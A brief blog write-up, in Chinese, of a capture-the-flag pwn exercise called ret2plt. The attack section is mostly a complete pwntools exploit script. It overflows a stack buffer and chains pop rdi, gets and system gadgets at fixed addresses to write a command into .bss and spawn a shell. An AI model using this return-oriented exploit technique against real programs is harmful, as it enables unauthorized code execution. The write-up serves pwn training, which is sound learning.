Yuawn Pwn ret2plt Write up

77 words

1 minutes

Yuawn Pwn ret2plt Write up

2024-08-09

Cyber Security

CTF

前言:#

在繼續 lys rop3 前，我們要先學會 ret2plt ㄉ技巧

Recon#

file:

checksec:

r2:

objdump:

gdb:

目標是先給一個可以寫東西的 address 再用 gets 進行寫入，並寫利用 system 去執行

exploit#

from pwn import *

context(arch="amd64")

r=process('./ret2plt')

pop_rdi=p64(0x0000000000400733)
system=p64(0x0000000000400520)
gets=p64(0x0000000000400530)

bss=p64(0x601070)

r.sendline('a'*0x38+pop_rdi+
           bss+
           gets+ #寫入
           pop_rdi+
           bss+
           system) #執行

r.interactive()

pwned!#

Yuawn Pwn ret2plt Write up

https://dkri3c1.github.io/posts/yuawnpwnret2pltwrite-up/

Author

dkri3c1

Published at

2024-08-09

License

CC BY-NC-SA 4.0

HITCON CMT 2024 心得

lys rop2 Writes up